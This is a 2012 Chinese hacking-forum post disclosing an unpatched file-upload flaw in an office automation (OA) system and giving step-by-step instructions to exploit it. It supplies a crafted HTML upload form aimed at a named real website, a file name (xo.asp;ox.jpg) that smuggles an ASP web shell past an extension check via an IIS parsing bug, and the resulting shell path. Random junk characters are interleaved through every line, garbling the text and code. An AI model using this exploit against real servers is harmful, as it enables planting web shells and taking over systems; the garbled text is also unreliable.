中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞* b  v3 B$ w+ E4 X6 a

8 \" p3 K8 }/ W! G* [% T7 |系统介绍:& X1 ^7 C) b0 K4 ~

) h, B2 {8 T! {7 w6 v% Z# Z全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。! p! L8 W: M1 v( I; k4 T6 Y

' J' S! H! j4 R主要功能:
3 @! e1 K# L0 a! t$ A. o7 t公司通告 % W$ Q( d8 F5 t/ F, R2 a
工作计划 ! R' H+ v0 |6 g( `
通讯助理
; x, c% [0 h' Y" q客户资源 ( |$ f) h# E7 P/ S2 R* o+ S5 Y
我的公文
5 L6 d1 R* C2 j公文传阅 * \$ |( |- ^4 M2 o$ ~& W
公共资源
! N+ }: R0 ]1 i* k9 G8 g资源预约
7 e3 k7 z6 T- z1 N/ |今日考勤
$ B2 i2 C3 H5 |5 J* x* w个人计划 4 Y$ }& E# [) @$ }3 A
个人通讯录
3 E, D( f' M' U3 ]5 ^) G个人基本档案
; r9 S3 B" g* t1 }未读邮件 4 K- m, X, Y" b  ]5 C9 s
发邮件 7 D" A0 d& ^$ `$ @1 K& p
收件夹
7 i7 V. H7 [( T) w& o- _& L) N寄件夹
' n" A8 d: M" Z, b- z网络硬盘
! q" X0 u0 C3 N6 s网络会议 - b/ M! {6 W; R$ A+ D
网络调查 3 L# `9 m  b% w* R6 r) r. A+ m
交流论坛8 V* y9 W5 _( |

5 H+ ]" `. r9 y7 B+ `有兴趣测试的朋友可以下源码看看
- S6 h" Z) I. @# w: X/ d) {: G' R
源码下载:
: B% U- z8 S$ c8 C: }
! K. \4 H% I7 N  }% }: X! mhttp://www.mycodes.net/30/4750.htm
+ p& B" C8 M7 Y" K  z8 l0 q7 x7 S: x% b# H3 p5 B/ ^
漏洞介绍:" |* E! K- q5 x: l: ^/ S. {% Z
! ]% Z% ]# Y( u0 R! i) d
由upfile.asp上传文件漏洞引起1 A6 [; G% B8 W; @4 U  Z! d  Q( e

/ f0 v$ k: _- w9 B  L8 p" [/ Y测试方法:5 x- {- ^+ D, e1 M+ }7 n

) x0 N1 v% T" ?$ ~' g! D使用名小子上传http://www.itlynn.com/upfile.asp即可
' q1 H( {5 j6 M6 V; ~( P
- W" h0 r  f0 t' C# Q4 M如果upfile.asp文件被删除不存在。
: b, u+ x* T# g7 R. k% _. t2 Z4 D) P8 u( U) W; O( v7 m; B
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp# S3 j% x5 q! o% h' E# d" r1 u: f
4 B5 J: k" Q9 n! ?1 _
如果存在那么将如下代码保存为upfile.html。
2 k0 N& ?9 {. o% a- y- h( t
9 Q  N/ M, X. f然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp4 F4 X; w) ^8 G( @: o/ @
1 e6 {# Q0 g% l! l

0 K5 }" n8 W5 a* L* Y2 E7 }2 l" H) Y7 ?. o. n5 l8 g( S7 ~
01 <table border='0' align="center" cellpadding="5"> ; l2 Y: w& f- P$ x( S$ s3 i2 `

/ B2 Y/ c3 I6 {: m9 O02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 9 }0 e5 d" L- S" Y

9 U( V4 [4 H. a# b6 ^/ e( ^  `03 <tr>
& e. H7 b2 m( g0 k) x! E$ B, u5 P& l8 K
4 R0 O. [! f* o" T% C* X" x7 y) ]9 a04             <td>报错:</td> % l% I) G" _9 a( T0 p/ ?# V* n& L
; s: K# N+ d( t. t' r1 p/ R
05             <td><input type='radio' name='errnumber' value='0'> . `8 b) j4 C  d/ m2 W/ ^; _$ ?

3 v8 {% `& ^$ d# l4 O* k06               自动更名 ! J7 Z  W$ Y& g8 A$ z. h8 J6 \
/ j  F: _) M' K1 o
07               <input type='radio' name='errnumber' value='1' checked> 8 Y9 A; n$ T- Y
; t$ Z  z  {% d
08               报错方式 4 Y5 Q1 P" K) L  ^
8 R; t1 [! I: m" V
09               <input type='radio' name='errnumber' value='2'> $ a4 I* O  D; Q2 M. z; T
: \$ h$ ^9 [$ H3 n
10               直接覆盖</td>
  @0 s/ A5 \  z* _: l2 C
2 I  t7 O" e# n% t) f7 _7 R11           </tr>
3 I9 \/ D* X$ Z5 F) h
; ~! ?6 J. G, p' P9 I' [, x1 I9 Q12           <tr> - r6 ^6 Y- n# l( H5 G
1 X6 K$ m% D; v' T8 @
13             <td>主题:</td> $ t0 K; G" n3 z" k+ v. p* z
8 o& r- p5 y& I' t3 a
14             <td><input type='text' name='filename' size='30'></td> 4 R3 X2 s) U- |( [# n9 d7 z
1 i6 |# ]2 y; M! o
15           </tr>
/ j. J! K1 i% m$ d0 P) L5 L+ c$ L/ Y+ \/ N
16           <tr> " w8 }  `1 S+ Q& t9 [5 U

" {3 j8 S3 U6 A/ }& }* J+ M17             <td>文件:</td> + H) m! ~/ U+ @# A

" N" }+ i% I. i4 Y0 j4 ~% r7 r18             <td><input type="file"name="fruit"size="30"></td> + ?: Z" t; H* A5 d
% x8 `# Y6 \1 p. R$ X3 V" c8 p
19           </tr>
8 E1 ]' E4 j/ t7 ]8 Z
9 U8 i0 O" c' c& J& I20           <tr>
% R4 b( P/ w. y+ X* i: V" M
7 U0 I0 E% n4 [$ j. e5 H21             <td valign='top'>简介:</td> : L* h% h$ C. i' @  Y4 C/ S

0 A& J" m% ?/ S8 T1 B22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ! [; ]$ O( V# C) j8 k
& F5 o3 f# {- `6 b$ b( {  J* Q: b
23           </tr> & J' N2 Z+ L) r  K) B( a

; ^: C. z2 p# s3 x) x8 R- |5 w24   
) \) f# ]" n1 h8 x' z! d5 O; A7 U. M; z
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> . _- R4 b; k/ W
! D1 u) U8 E- @( }6 j
26           </tr> ; b% X. `4 P" l! \

9 v! ?3 f7 j) A/ O3 J3 x0 t& \0 M+ Y: T- r27         </form> 7 F! b# }6 x% _- D4 B! T! H* m
2 i/ _' G( N6 t. |0 j: N8 n
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
% r' |- k9 ~8 ^5 l; z  O0 B) A$ f9 z+ s1 x+ U, m5 [' ]/ y
# U. v" v2 K( R5 r

  F& r' C7 C) c' j" _" V上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* R; y" y& U( n& }) _! D
, B: H# y! C* I此漏洞需要配合解析漏洞利用。
/ p2 ~; _# R6 A4 s  z) p/ G% U
6 L3 ]4 U: p$ Z' A* U3 |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2